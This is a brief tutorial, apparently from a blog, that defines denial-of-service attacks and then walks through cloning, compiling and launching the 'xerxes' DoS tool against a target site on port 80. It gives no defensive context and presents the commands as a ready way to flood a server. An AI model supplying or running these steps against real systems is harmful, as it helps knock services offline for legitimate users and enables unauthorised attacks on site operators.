X
What is DOS attack?
Type of attack which floods servers or networks which results in making the source inaccessible for the legitimate users.
This tool was committed on Github by zanyarjamal, it is one of the simple and most powerful DOS tools. To clone the tool from Github.
git clone https://github.com/zanyarjamal/xerxes.git
Then navigate to the cloned folder.
cd xerxes
Next, You Should compile with GNU GCC compiler
gcc xerxes.c -o xerxes
To launch the attack
./xerxes site.com 80
For more watch the video to our channel how it works 🙂